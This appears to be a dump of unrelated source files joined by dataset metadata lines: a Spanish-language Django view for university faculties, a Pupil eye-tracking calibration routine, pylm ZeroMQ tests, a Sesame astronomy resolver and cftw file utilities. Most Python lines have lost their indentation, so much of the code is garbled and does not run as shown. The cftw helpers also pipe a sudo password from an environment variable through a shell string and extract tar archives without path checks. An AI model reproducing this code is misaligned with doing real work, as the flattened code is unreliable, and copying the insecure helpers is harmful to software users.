#COD. PROGRAMA;PROGRAMA ACADÉMICO;JORNADA;FACULTAD;SEDE
for nombre,codigo in diccionarioSedes.items():
try:
Sede.objects.get(codigo=codigo, is_active=True)
except Sede.DoesNotExist:
sede = Sede()
sede.codigo = codigo
sede.nombre_sede = nombre
try:
sede.save()
except Exception as e:
print("No se pudo guardar la sede" + sede.nombre_sede)
            # Check that the faculty records exist, and create them if needed.
diccionarioFacultad= { 'CONSEJO SUPERIOR':'1', 'CONSEJO ACADÉMICO':'2',
'INGENIERÍA':'3', 'CIENCIAS DE LA ADMINISTRACIÓN':'4',
'CIENCIAS NATURALES Y EXACTAS':'5', 'HUMANIDADES':'6',
'CIENCIAS SOCIALES Y ECONÓMICAS':'7', 'ARTES INTEGRADAS':'8',
'SALUD':'9', 'INSTITUTO DE EDUCACIÓN Y PEDAGOGÍA':'10' ,
'INSTITUTO DE PSICOLOGÍA': '11'}
            # Create the faculties
for nombre,codigo in diccionarioFacultad.items():
try:
Corporacion.objects.get(id_corporation=codigo, is_active=True)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
corporacion.id_corporation = codigo
                    # Codes of the corporations whose names do not take the "FACULTAD DE" prefix
if codigo not in {'1' , '2' , '10', '11'}:
corporacion.name_corporation = "FACULTAD DE " + nombre
else:
corporacion.name_corporation = nombre
try:
corporacion.save()
except Exception as e:
print("No se pudo guardar la corporacion" + corporacion.name_corporation)
#COD. PROGRAMA;PROGRAMA ACADÉMICO;JORNADA;FACULTAD;SEDE
            # Now create the corporations
for row in reader:
if line > 0:
try:
Corporacion.objects.get(id_corporation=row[0] , sede__codigo=diccionarioSedes.get(row[4]) , is_active=True)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
try:
corporacion.id_corporation = row[0]
corporacion.name_corporation = row[1]
corporacion.facultad = Corporacion.objects.get(id_corporation=diccionarioFacultad.get(row[3]))
sede = diccionarioSedes.get(row[4])
corporacion.sede = Sede.objects.get(codigo=sede)
corporacion.save()
counter+= 1
except Exception as e:
print(e)
except Exception as e:
llamarMensaje = "fracaso_corporacion"
mensaje = "Hubo un problema con el archivo de entrada, no coinciden los datos de entrada con la especificaciones dadaas"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
                    line += 1
            #Query the corporation in the database.
llamarMensaje = "exito_corporacion"
mensaje = "Se crearon " + str(counter)+" corporacion(es) sactisfactoriamente"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
form = FormularioRegistroCorporacion()
form2 = FormularioCargar()
return render(request, 'registro_corporacion.html',{'mensaje': mensaje, 'form': form , 'form2': form2})
# View to list corporations
@permission_required("usuarios.Administrador", login_url="/")
def listar_corporacion(request):
llamarMensaje = request.session.pop('llamarMensaje', None)
mensaje = request.session.pop('mensaje', None)
corporaciones = Corporacion.objects.filter(is_active=True)
return render(request, 'listar_corporaciones.html', {'corporaciones': corporaciones , 'llamarMensaje': llamarMensaje,'mensaje':mensaje })
#Corporation editing
@permission_required("usuarios.Administrador" , login_url="/")
def editar_corporacion(request, id_corporation=None):
corporacion = Corporacion.objects.get(id=id_corporation)
if request.method == 'POST':
form = FormularioEditarCorporacion(request.POST)
        #If the form is valid and has data
if form.is_valid():
            #Capture the corporation id
corporacion.name_corporation = form.cleaned_data["name_corporation"]
corporacion.facultad = form.cleaned_data["facultad"]
corporacion.sede = form.cleaned_data["sede"]
            #Update the corporation in the DB; print the exception if one occurs
try:
corporacion.save()
except Exception as e:
print(e)
            #Query the corporation in the database.
llamarMensaje = "edito_corporacion"
mensaje = "Se editó la corporacion " +str(corporacion) +" sactisfactoriamente"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
print("por aca")
else:
if id_corporation is None:
return render(request, 'administrador.html')
else:
form = FormularioEditarCorporacion()
form.initial = {'id_corporation': corporacion.id_corporation, 'name_corporation': corporacion.name_corporation, 'facultad': corporacion.facultad,
'sede': corporacion.sede}
if corporacion.facultad is not None:
form.fields["facultad"].empty_label = None
form.fields["sede"].empty_label = None
else:
form.fields['facultad'].widget.attrs['disabled'] = True
form.fields['sede'].widget.attrs['disabled'] = True
return render(request, 'editar_corporacion.html', {'form': form})
# This method does not delete from the database; it deactivates the corporation instead
@permission_required("usuarios.Administrador", login_url="/")
def eliminar_corporacion(request, id_corporation=None):
if request.method == 'POST':
corporacion=Corporacion.objects.get(id=id_corporation)
        # fetch the corporation's voters
votantes_corporacion = Votante.objects.filter((Q(plan__facultad__id=corporacion.id) | Q(plan__id=corporacion.id)) & Q(is_active=True))
        # If the corporation has voters
if votantes_corporacion:
llamarMensaje = "fracaso_usuario"
mensaje = "No se eliminó la corporacion " + str(id_corporation) +" porque tiene votantes asociados"
else:
corporacion.is_active = False
llamarMensaje = "exito_usuario"
mensaje = "Se eliminó la corporacion " + str(id_corporation) +" sactisfactoriamente"
try:
corporacion.save()
except Exception as e:
print(e)
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
def corporacion_create(corporacion, form):
corporacion.id_corporation= form.cleaned_data["id_corporation"]
corporacion.name_corporation= form.cleaned_data["name_corporation"]
corporacion.facultad= form.cleaned_data["facultad"]
corporacion.sede= form.cleaned_data["sede"]
corporacion.is_active = True
try:
corporacion.save()
except Exception as e:
print(e)
|
apache-2.0
| 9,110,471,766,066,271,000
| 43.155556
| 157
| 0.585472
| false
| 3.509567
| false
| false
| false
|
teamCarel/EyeTracker
|
src/shared_modules/calibration_routines/finish_calibration.py
|
1
|
17482
|
'''
(*)~---------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2017 Pupil Labs
Distributed under the terms of the GNU
Lesser General Public License (LGPL v3.0).
See COPYING and COPYING.LESSER for license details.
---------------------------------------------------------------------------~(*)
'''
import os
import numpy as np
from . import calibrate
from math_helper import *
from file_methods import load_object,save_object
from . camera_intrinsics_estimation import load_camera_calibration
from . optimization_calibration import bundle_adjust_calibration
from . calibrate import find_rigid_transform
#logging
import logging
logger = logging.getLogger(__name__)
from . gaze_mappers import *
not_enough_data_error_msg = 'Did not collect enough data during calibration.'
solver_failed_to_converge_error_msg = 'Parameters could not be estimated from data.'
def finish_calibration(g_pool,pupil_list,ref_list):
if pupil_list and ref_list:
pass
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
camera_intrinsics = load_camera_calibration(g_pool)
# match eye data and check if biocular and or monocular
pupil0 = [p for p in pupil_list if p['id']==0]
pupil1 = [p for p in pupil_list if p['id']==1]
#TODO unify this and don't do both
matched_binocular_data = calibrate.closest_matches_binocular(ref_list,pupil_list)
matched_pupil0_data = calibrate.closest_matches_monocular(ref_list,pupil0)
matched_pupil1_data = calibrate.closest_matches_monocular(ref_list,pupil1)
if len(matched_pupil0_data)>len(matched_pupil1_data):
matched_monocular_data = matched_pupil0_data
else:
matched_monocular_data = matched_pupil1_data
logger.info('Collected {} monocular calibration data.'.format(len(matched_monocular_data)))
logger.info('Collected {} binocular calibration data.'.format(len(matched_binocular_data)))
mode = g_pool.detection_mapping_mode
if mode == '3d' and not camera_intrinsics:
mode = '2d'
logger.warning("Please calibrate your world camera using 'camera intrinsics estimation' for 3d gaze mapping.")
if mode == '3d':
hardcoded_translation0 = np.array([20,15,-20])
hardcoded_translation1 = np.array([-40,15,-20])
if matched_binocular_data:
method = 'binocular 3d model'
            #TODO model the world as cv2 pinhole camera with distortion and focal in ceres.
# right now we solve using a few permutations of K
smallest_residual = 1000
scales = list(np.linspace(0.7,1.4,20))
K = camera_intrinsics["camera_matrix"]
for s in scales:
scale = np.ones(K.shape)
scale[0,0] *= s
scale[1,1] *= s
camera_intrinsics["camera_matrix"] = K*scale
ref_dir, gaze0_dir, gaze1_dir = calibrate.preprocess_3d_data(matched_binocular_data,
camera_intrinsics = camera_intrinsics )
if len(ref_dir) < 1 or len(gaze0_dir) < 1 or len(gaze1_dir) < 1:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
sphere_pos0 = pupil0[-1]['sphere']['center']
sphere_pos1 = pupil1[-1]['sphere']['center']
initial_R0,initial_t0 = find_rigid_transform(np.array(gaze0_dir)*500,np.array(ref_dir)*500)
initial_rotation0 = math_helper.quaternion_from_rotation_matrix(initial_R0)
initial_translation0 = np.array(initial_t0).reshape(3)
initial_R1,initial_t1 = find_rigid_transform(np.array(gaze1_dir)*500,np.array(ref_dir)*500)
initial_rotation1 = math_helper.quaternion_from_rotation_matrix(initial_R1)
initial_translation1 = np.array(initial_t1).reshape(3)
eye0 = { "observations" : gaze0_dir , "translation" : hardcoded_translation0 , "rotation" : initial_rotation0,'fix':['translation'] }
eye1 = { "observations" : gaze1_dir , "translation" : hardcoded_translation1 , "rotation" : initial_rotation1,'fix':['translation'] }
world = { "observations" : ref_dir , "translation" : (0,0,0) , "rotation" : (1,0,0,0),'fix':['translation','rotation'],'fix':['translation','rotation'] }
initial_observers = [eye0,eye1,world]
initial_points = np.array(ref_dir)*500
success,residual, observers, points = bundle_adjust_calibration(initial_observers , initial_points, fix_points=False )
if residual <= smallest_residual:
smallest_residual = residual
scales[-1] = s
if not success:
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
logger.error("Calibration solver faild to converge.")
return
eye0,eye1,world = observers
t_world0 = np.array(eye0['translation'])
R_world0 = math_helper.quaternion_rotation_matrix(np.array(eye0['rotation']))
t_world1 = np.array(eye1['translation'])
R_world1 = math_helper.quaternion_rotation_matrix(np.array(eye1['rotation']))
def toWorld0(p):
return np.dot(R_world0, p)+t_world0
def toWorld1(p):
return np.dot(R_world1, p)+t_world1
points_a = [] #world coords
points_b = [] #eye0 coords
points_c = [] #eye1 coords
for a,b,c,point in zip(world['observations'] , eye0['observations'],eye1['observations'],points):
line_a = np.array([0,0,0]) , np.array(a) #observation as line
line_b = toWorld0(np.array([0,0,0])) , toWorld0(b) #eye0 observation line in world coords
line_c = toWorld1(np.array([0,0,0])) , toWorld1(c) #eye1 observation line in world coords
close_point_a,_ = math_helper.nearest_linepoint_to_point( point , line_a )
close_point_b,_ = math_helper.nearest_linepoint_to_point( point , line_b )
close_point_c,_ = math_helper.nearest_linepoint_to_point( point , line_c )
points_a.append(close_point_a)
points_b.append(close_point_b)
points_c.append(close_point_c)
# we need to take the sphere position into account
# orientation and translation are referring to the sphere center.
# but we want to have it referring to the camera center
# since the actual translation is in world coordinates, the sphere translation needs to be calculated in world coordinates
sphere_translation = np.array( sphere_pos0 )
sphere_translation_world = np.dot( R_world0 , sphere_translation)
camera_translation = t_world0 - sphere_translation_world
eye_camera_to_world_matrix0 = np.eye(4)
eye_camera_to_world_matrix0[:3,:3] = R_world0
eye_camera_to_world_matrix0[:3,3:4] = np.reshape(camera_translation, (3,1) )
sphere_translation = np.array( sphere_pos1 )
sphere_translation_world = np.dot( R_world1 , sphere_translation)
camera_translation = t_world1 - sphere_translation_world
eye_camera_to_world_matrix1 = np.eye(4)
eye_camera_to_world_matrix1[:3,:3] = R_world1
eye_camera_to_world_matrix1[:3,3:4] = np.reshape(camera_translation, (3,1) )
g_pool.plugins.add(Binocular_Vector_Gaze_Mapper,args={
'eye_camera_to_world_matrix0':eye_camera_to_world_matrix0,
'eye_camera_to_world_matrix1':eye_camera_to_world_matrix1 ,
'camera_intrinsics': camera_intrinsics ,
'cal_points_3d': points,
'cal_ref_points_3d': points_a,
'cal_gaze_points0_3d': points_b,
'cal_gaze_points1_3d': points_c})
elif matched_monocular_data:
method = 'monocular 3d model'
            #TODO model the world as cv2 pinhole camera with distortion and focal in ceres.
# right now we solve using a few permutations of K
smallest_residual = 1000
scales = list(np.linspace(0.7,1.4,20))
K = camera_intrinsics["camera_matrix"]
for s in scales:
scale = np.ones(K.shape)
scale[0,0] *= s
scale[1,1] *= s
camera_intrinsics["camera_matrix"] = K*scale
ref_dir , gaze_dir, _ = calibrate.preprocess_3d_data(matched_monocular_data,
camera_intrinsics = camera_intrinsics )
# save_object((ref_dir,gaze_dir),os.path.join(g_pool.user_dir, "testdata"))
if len(ref_dir) < 1 or len(gaze_dir) < 1:
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
logger.error(not_enough_data_error_msg + " Using:" + method)
return
            ### monocular calibration strategy: minimize the reprojection error by moving the world camera.
# we fix the eye points and work in the eye coord system.
initial_R,initial_t = find_rigid_transform(np.array(ref_dir)*500,np.array(gaze_dir)*500)
initial_rotation = math_helper.quaternion_from_rotation_matrix(initial_R)
initial_translation = np.array(initial_t).reshape(3)
                # this problem is scale invariant so we scale to some sensible value.
if matched_monocular_data[0]['pupil']['id'] == 0:
hardcoded_translation = hardcoded_translation0
else:
hardcoded_translation = hardcoded_translation1
eye = { "observations" : gaze_dir , "translation" : (0,0,0) , "rotation" : (1,0,0,0),'fix':['translation','rotation'] }
world = { "observations" : ref_dir , "translation" : np.dot(initial_R,-hardcoded_translation) , "rotation" : initial_rotation,'fix':['translation'] }
initial_observers = [eye,world]
initial_points = np.array(gaze_dir)*500
success,residual, observers, points_in_eye = bundle_adjust_calibration(initial_observers , initial_points, fix_points=True )
if residual <= smallest_residual:
smallest_residual = residual
scales[-1] = s
eye, world = observers
if not success:
logger.error("Calibration solver faild to converge.")
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
#pose of the world in eye coords.
rotation = np.array(world['rotation'])
t_world = np.array(world['translation'])
R_world = math_helper.quaternion_rotation_matrix(rotation)
# inverse is pose of eye in world coords
R_eye = R_world.T
t_eye = np.dot(R_eye,-t_world)
def toWorld(p):
return np.dot(R_eye, p)+np.array(t_eye)
points_in_world = [toWorld(p) for p in points_in_eye]
points_a = [] #world coords
points_b = [] #cam2 coords
for a,b,point in zip(world['observations'] , eye['observations'],points_in_world):
line_a = np.array([0,0,0]) , np.array(a) #observation as line
line_b = toWorld(np.array([0,0,0])) , toWorld(b) #cam2 observation line in cam1 coords
close_point_a,_ = math_helper.nearest_linepoint_to_point( point , line_a )
close_point_b,_ = math_helper.nearest_linepoint_to_point( point , line_b )
# print np.linalg.norm(point-close_point_a),np.linalg.norm(point-close_point_b)
points_a.append(close_point_a)
points_b.append(close_point_b)
# we need to take the sphere position into account
# orientation and translation are referring to the sphere center.
# but we want to have it referring to the camera center
# since the actual translation is in world coordinates, the sphere translation needs to be calculated in world coordinates
sphere_translation = np.array( matched_monocular_data[-1]['pupil']['sphere']['center'] )
sphere_translation_world = np.dot( R_eye , sphere_translation)
camera_translation = t_eye - sphere_translation_world
eye_camera_to_world_matrix = np.eye(4)
eye_camera_to_world_matrix[:3,:3] = R_eye
eye_camera_to_world_matrix[:3,3:4] = np.reshape(camera_translation, (3,1) )
g_pool.plugins.add(Vector_Gaze_Mapper,args=
{'eye_camera_to_world_matrix':eye_camera_to_world_matrix ,
'camera_intrinsics': camera_intrinsics ,
'cal_points_3d': points_in_world,
'cal_ref_points_3d': points_a,
'cal_gaze_points_3d': points_b,
'gaze_distance':500})
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
elif mode == '2d':
if matched_binocular_data:
method = 'binocular polynomial regression'
cal_pt_cloud_binocular = calibrate.preprocess_2d_data_binocular(matched_binocular_data)
cal_pt_cloud0 = calibrate.preprocess_2d_data_monocular(matched_pupil0_data)
cal_pt_cloud1 = calibrate.preprocess_2d_data_monocular(matched_pupil1_data)
map_fn,inliers,params = calibrate.calibrate_2d_polynomial(cal_pt_cloud_binocular,g_pool.capture.frame_size,binocular=True)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
map_fn,inliers,params_eye0 = calibrate.calibrate_2d_polynomial(cal_pt_cloud0,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
map_fn,inliers,params_eye1 = calibrate.calibrate_2d_polynomial(cal_pt_cloud1,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
g_pool.plugins.add(Binocular_Gaze_Mapper,args={'params':params, 'params_eye0':params_eye0, 'params_eye1':params_eye1})
elif matched_monocular_data:
method = 'monocular polynomial regression'
cal_pt_cloud = calibrate.preprocess_2d_data_monocular(matched_monocular_data)
map_fn,inliers,params = calibrate.calibrate_2d_polynomial(cal_pt_cloud,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
g_pool.plugins.add(Monocular_Gaze_Mapper,args={'params':params})
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
ts = g_pool.get_timestamp()
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.successful','method':method,'timestamp': ts, 'record':True})
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.calibration_data','timestamp': ts, 'pupil_list':pupil_list,'ref_list':ref_list,'calibration_method':method,'record':True})
    #this is only used by show calibration. TODO: rewrite show calibration.
user_calibration_data = {'timestamp': ts,'pupil_list':pupil_list,'ref_list':ref_list,'calibration_method':method}
save_object(user_calibration_data,os.path.join(g_pool.user_dir, "user_calibration_data"))
|
lgpl-3.0
| 1,249,891,660,788,555,000
| 50.875371
| 194
| 0.605709
| false
| 3.668065
| false
| false
| false
|
nfqsolutions/pylm
|
tests/test_services/test_subscribed_client.py
|
1
|
2736
|
import concurrent.futures
import time
from concurrent.futures import ThreadPoolExecutor
import zmq
from pylm.clients import Client
from pylm.parts.core import zmq_context
from pylm.parts.messages_pb2 import PalmMessage
def fake_server(messages=1):
db_socket = zmq_context.socket(zmq.REP)
db_socket.bind('inproc://db')
pull_socket = zmq_context.socket(zmq.PULL)
pull_socket.bind('inproc://pull')
pub_socket = zmq_context.socket(zmq.PUB)
pub_socket.bind('inproc://pub')
# PUB-SUB takes a while
time.sleep(1.0)
for i in range(messages):
message_data = pull_socket.recv()
print(i)
message = PalmMessage()
message.ParseFromString(message_data)
topic = message.client
pub_socket.send_multipart([topic.encode('utf-8'), message_data])
def test_subscribed_client_single():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
push_address='inproc://pull',
sub_address='inproc://pub',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=2),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 2
def test_subscribed_client_multiple():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
client1 = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=4),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2),
executor.submit(client1.job, 'f', [b'a', b'b'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 4
if __name__ == '__main__':
test_subscribed_client_single()
test_subscribed_client_multiple()
|
agpl-3.0
| -7,718,448,006,989,908,000
| 25.823529
| 72
| 0.56981
| false
| 3.858956
| false
| false
| false
|
Stargrazer82301/CAAPR
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/tools/sesame.py
|
1
|
3792
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.tools.sesame Contains the Sesame class.
# -----------------------------------------------------------------
"""
Created on Mar 13, 2011
Sesame class to access Sesame name resolver service
Based on 2005-06-11 by Shui Hung Kwok
See http://cdsweb.u-strasbg.fr/doc/sesame.htx for description of Sesame
@author: shkwok
"""
from urllib2 import urlopen
#from xparser.XParser import XParser
#from .. import XParser
# -----------------------------------------------------------------
class Sesame (object):
"""
This class ...
"""
CatalogOpt = "SNV" # S simbad, N ned, V vizier, A All
OutputOpt = "oxp" # xp for xml as text/plain rather then text/xml (-ox)
SesameURL = "http://cdsweb.u-strasbg.fr/cgi-bin/nph-sesame"
def __init__(self, urn=SesameURL, opt=CatalogOpt, opt1=OutputOpt):
"""
Initializes Sesame URL and options
Default options are SNV for CatalogOpt
and -oxp for OutputOpt.
SNV = Simbad + NED + Vizier and A for All
The order indicates the order to search.
"All" means search all services, otherwise stops when
first entry found.
Output options start with -o
followed by
x : xml output
p : plain text
I : include all identifiers
"""
self.catOpt = opt
self.outOpt = opt1
self.urn = urn
# Sesame
    def getCoord(self, node):
        """
        Helper method to extract ra and dec from node
        """
        res = node.getResource("/Sesame/Target")
        resolvers = res.getChildren("Resolver")
        for r in resolvers:
            try:
                ra = float(r.getResourceContent("/Resolver/jradeg").strip())
                dec = float(r.getResourceContent("/Resolver/jdedeg").strip())
                return ra, dec
            except Exception:
                # this resolver did not provide usable coordinates; try the next
                continue
        raise Exception, "no ra/dec values found"
# getCoord
def getAliases(self):
"""
Extracts aliases for the given target.
Returns a list of names.
"""
res = []
for resolver in self.xml.root.Sesame.Resolver:
try:
for a in resolver.alias:
res.append (a.content)
except:
pass
return res
def buildQuery(self, name, all=True):
"""
Builds query URL for use with HTTP GET
If all is true, then all known identifiers shall be returned.
"""
opt = self.catOpt
opt1 = '-' + self.outOpt
if all:
opt += 'A'
opt1 += 'I' # all identifiers
queryURL = "%s/%s/%s?%s" % (self.urn, opt1, opt, name)
return queryURL
def resolveRaw(self, name, all=True):
"""
Performs a raw query.
Returns what the server returns.
"""
query = self.buildQuery (name, all)
print "query=", query
hcon = urlopen (query)
res = hcon.read ()
hcon.close ()
return res
def resolve(self, name, all=True):
"""
Performs a query.
Returns ra and dec
"""
query = self.buildQuery(name, all)
        xp = XParser()  # NOTE: requires the XParser import that is commented out at the top of this file
xn = xp.parseFromFile(query)
return self.getCoord(xn)
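# -----------------------------------------------------------------

# Usage sketch (illustrative addition, not part of the original module).
# resolveRaw() needs only urllib2, so it runs as-is; resolve() additionally
# requires the XParser dependency whose import is commented out above.
if __name__ == "__main__":
    sesame = Sesame()
    print "query URL:", sesame.buildQuery("M31", all=False)
    print sesame.resolveRaw("M31", all=False)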
|
mit
| -434,090,002,494,834,500
| 27.727273
| 78
| 0.498813
| false
| 4.193584
| false
| false
| false
|
containers-ftw/cftw
|
cftw/utils.py
|
1
|
8502
|
'''
utils.py: part of cftw package
Copyright (c) 2017 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import errno
import fnmatch
import os
import json
import re
import shutil
import simplejson
from cftw.logger import bot
import sys
import subprocess
import tempfile
import tarfile
import zipfile
######################################################################################
# Local commands and requests
######################################################################################
def get_installdir():
'''get_installdir returns the installation directory of the application
'''
return os.path.abspath(os.path.dirname(__file__))
def run_command(cmd,error_message=None,sudopw=None,suppress=False):
    '''run_command uses subprocess to send a command to the terminal.
    :param cmd: the command to send, should be a list for subprocess
    :param error_message: the error message to give to user if fails,
    if none specified, will alert that command failed.
    :param sudopw: if specified (not None) command will be run asking for sudo
    :param suppress: if True, return the command string itself instead of
    capturing the command's output
    '''
if sudopw == None:
sudopw = os.environ.get('pancakes',None)
if sudopw != None:
cmd = ' '.join(["echo", sudopw,"|","sudo","-S"] + cmd)
if suppress == False:
output = os.popen(cmd).read().strip('\n')
else:
output = cmd
os.system(cmd)
else:
try:
process = subprocess.Popen(cmd,stdout=subprocess.PIPE)
output, err = process.communicate()
except OSError as error:
bot.error(err)
return None
return output
############################################################################
## FILE OPERATIONS #########################################################
############################################################################
def write_file(filename,content,mode="w"):
'''write_file will open a file, "filename" and write content, "content"
and properly close the file
'''
with open(filename,mode) as filey:
filey.writelines(content)
return filename
def write_json(json_obj,filename,mode="w",print_pretty=True):
'''write_json will (optionally,pretty print) a json object to file
:param json_obj: the dict to print to json
:param filename: the output file to write to
:param pretty_print: if True, will use nicer formatting
'''
with open(filename,mode) as filey:
if print_pretty == True:
filey.writelines(simplejson.dumps(json_obj, indent=4, separators=(',', ': ')))
else:
filey.writelines(simplejson.dumps(json_obj))
return filename
def read_file(filename,mode="r"):
    '''read_file will open a file, "filename", read all of its lines,
    and properly close the file
'''
with open(filename,mode) as filey:
content = filey.readlines()
return content
def read_json(filename,mode="r"):
'''read_json will open a file, "filename" and read the string as json
'''
with open(filename,mode) as filey:
content = json.loads(filey.read())
return content
def recursive_find(base,pattern=None):
    '''recursive_find will search for files matching the given pattern
    in all directory levels below a base directory.
'''
if pattern is None:
pattern = "*"
files = []
for root, dirnames, filenames in os.walk(base):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
############################################################################
## FOLDER OPERATIONS #########################################################
############################################################################
def mkdir_p(path):
'''mkdir_p attempts to get the same functionality as mkdir -p
:param path: the path to create.
'''
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
bot.error("Error creating path %s, exiting." %path)
sys.exit(1)
def tree(base):
'''print a simple directory tree, primarily for showing
content of templates'''
for root, dirs, files in os.walk(base):
level = root.replace(base, '').count(os.sep)
indent = ' ' * 4 * (level)
print('{}{}/'.format(indent, os.path.basename(root)))
subindent = ' ' * 4 * (level + 1)
for f in files:
print('{}{}'.format(subindent, f))
############################################################################
## COMPRESSED FILES ########################################################
############################################################################
def detect_compressed(folder,compressed_types=None):
'''detect compressed will return a list of files in
some folder that are compressed, by default this means
.zip or .tar.gz, but the called can specify a custom list
:param folder: the folder base to use.
:param compressed_types: a list of types to include, should
be extensions in format like *.tar.gz, *.zip, etc.
'''
compressed = []
if compressed_types == None:
compressed_types = ["*.tar.gz",'*zip']
bot.debug("Searching for %s" %", ".join(compressed_types))
for filey in os.listdir(folder):
for compressed_type in compressed_types:
if fnmatch.fnmatch(filey, compressed_type):
compressed.append("%s/%s" %(folder,filey))
bot.debug("Found %s compressed files in %s" %len(compressed),folder)
return compressed
def unzip_dir(zip_file,dest_dir=None):
'''unzip_dir will extract a zipfile to a directory. If
an extraction destination is not defined, a temporary
directory will be created and used.
:param zip_file: the .zip file to unzip
:param dest_dir: the destination directory
'''
if dest_dir == None:
dest_dir = tempfile.mkdtemp()
with zipfile.ZipFile(zip_file,"r") as zf:
zf.extractall(dest_dir)
return dest_dir
def zip_dir(zip_dir, zip_name, output_folder=None):
    '''zip_dir will zip up an entire directory
    :param zip_dir: the folder to zip up
    :param zip_name: the name of the zip to return
    :param output_folder: optional folder to copy the finished zip into
'''
tmpdir = tempfile.mkdtemp()
output_zip = "%s/%s" %(tmpdir,zip_name)
zf = zipfile.ZipFile(output_zip, "w", zipfile.ZIP_DEFLATED, allowZip64=True)
for root, dirs, files in os.walk(zip_dir):
for file in files:
zf.write(os.path.join(root, file))
zf.close()
if output_folder != None:
shutil.copyfile(output_zip,"%s/%s"%(output_folder,zip_name))
shutil.rmtree(tmpdir)
output_zip = "%s/%s"%(output_folder,zip_name)
return output_zip
def untar_dir(tar_file,dest_dir=None):
'''untar_dir will extract a tarfile to a directory. If
an extraction destination is not defined, a temporary
directory will be created and used.
:param tar_file: the .tar.gz file to untar/decompress
:param dest_dir: the destination directory
'''
if dest_dir == None:
dest_dir = tempfile.mkdtemp()
contents = []
if tarfile.is_tarfile(tar_file):
with tarfile.open(tar_file) as tf:
tf.extractall(dest_dir)
return dest_dir
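############################################################################
## USAGE SKETCH ############################################################
############################################################################

# Illustrative addition, not part of the original module: round-trip a small
# dict through write_json/read_json inside a scratch directory.
if __name__ == '__main__':
    scratch = tempfile.mkdtemp()
    demo_path = os.path.join(scratch, "demo.json")
    write_json({"hello": "world"}, demo_path)
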